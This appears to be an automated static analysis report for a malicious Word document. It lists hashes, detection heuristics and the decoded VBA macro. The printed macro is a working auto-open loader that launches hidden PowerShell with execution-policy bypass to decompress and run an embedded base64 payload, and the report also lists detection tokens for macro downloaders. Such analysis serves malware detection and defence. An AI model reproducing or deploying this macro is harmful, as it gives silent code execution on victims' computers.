Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e88045931b9d9951…

MALICIOUS

Office (OLE)

Size: 137.5 KB
Created: 2016-09-30 10:53:00
Authoring application: Microsoft Office Word
First seen: 2020-12-25
MD5: a7b2aa20628ccb7b576b8f7246f92e74
SHA-1: 03da3415e9aee4ffea2ab8e4b82e9e696a530f5c
SHA-256: e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678
Risk Score: 318

Heuristics 10

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell exec, vbHide
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Arch = Environ("PROCESSOR_ARCHITECTURE")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  3006 bytes
SHA-256: dcc4bd0faccbbd2d385b67da3788a1be1aa30601b6dcacec5a8282916a3484d5
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String

Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    Command = "powershell.exe"
End If

str = "5VZRj6M2EH7Pr7AiHhItrIzBEC5a6a49VTqpqirt6u4hygMY00UlEB"
str = str + "FyzV7b/15mnDExez1V7WNfBuwZf/PNeDy2p9gDe7tc7N43zY"
str = str + "fDseuH1fJX3be6icR92TTL9Z4dz0VTK3Ya8mH86Msw6tmHdv"
str = str + "h56NnHuh/OefOuaTq1us795rNz3Q7scv2+XL9f1tt/7ef7Xu"
str = str + "eDfnoePyX5OV9xP/ts8nz9u/F9nZl7P5w+q374J74P+nDSw+"
str = str + "o1so1q+XbhdWMi35Vl8PRy1CwY1xS6f6+ruq2HumuZp1jwU3"
str = str + "7QbPmpbiOxZEE7jk7HXGmGMz+cWwWWJxYc89NpeO7PC+/y4H"
str = str + "Vv3jhJ5j6/hJzDJzKfmK+3bPfdy6B3+713gh3ll0qNGr0ZxS"
str = str + "YbBRpOIuGk0BKAwlGUAhQxKIpRSIEenCFXzjC0xikMBXjj1S"
str = str + "iKFGjlMJcQfFXRnwLQHKAiEAnMpfDHEQX+BJgoNIZlvASBQ0"
str = str + "DWYFdxoiFTl5XlHAvygWvLSQF/KSZHEqE0Js6TsZxWgHG4sY"
str = str + "42RNIYR8AqIm9xRnaRzZCx+2Y2/jbeCLxpJAl0KwDl4C0Fuw"
str = str + "q0UUFDEZMdpknOOMcO5ySx/JB44RiHyjE2drOIbCHFMcGjkA"
str = str + "UJ3F8JJhKyK234GBE6khVpETkE4hq5AD8JYSVgl2gQknbLlD"
str = str + "IoUkhTklkT9BaTNlZkguXIU2JQYpowQ+75MOcK/YJdmlt4ZQ"
str = str + "XEISraZAF+8bhgWeBZSCICSAAq5bQM2Rs8YfEkbaOwzmVE1R"
str = str + "RLUkSp421aIWc5iC17UKSRRdaUHIMnLV7oMpigEoKSsxA2dq"
str = str + "34D2uRmu1SpiL+38IkIvNvuwXu71yElMkIzxYkO4Vl+azGC1"
str = str + "LgkTSNJyMAg4KtL3Ln7P0hQv/2aGBhSnv8TAcGuwxcquS1cy"
str = str + "z0KSK8bLBdJzZebP/mZopJeyNC+2f9IrKcCrhw/CIh5bbcry"
str = str + "YxITyBfReG2OrTGd7srogdZNRWCWlNnwQGVUZMeUaOcki2mp"
str = str + "p0+RXidgPM2cfwteOylP6r2Mw22trA2KaEFTZobL7cDbCoaC"
str = str + "uE/TMPDSSUUmyFcvxibKHdaTz72FSzjEwmgcgppgkDxJdC4X"
str = str + "hDpni9FwCaC4pjYopRxtaYm0fRa5SbZj7VbkpaPGo51hpe4N"
str = str + "LxkUWkQGFeS6kDwG2/nx8NW1J4l2WJBRDfKikFdWAuV/BhXg"
str = str + "CRayeJKbJHLSY7sid+ErhvNw1e0L6huJnDUua+cxEkJDjfLq"
str = str + "quZyuvfuBbr2ZBo8fBSd3/qNtfhucgXI+zd3dr9ju8Vq/P5Z"
str = str + "15L+9X3uX+qRsHkVit77x67bNx6c6r9z4L1+wP1p2HoD03zf"
str = str + "bPhfcF37vOY39k5XsXHz7wzn0c8n4IHhutjyx41KprSwbPYc"
str = str + "7/Ag=="

exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""

Shell exec, vbHide

End Sub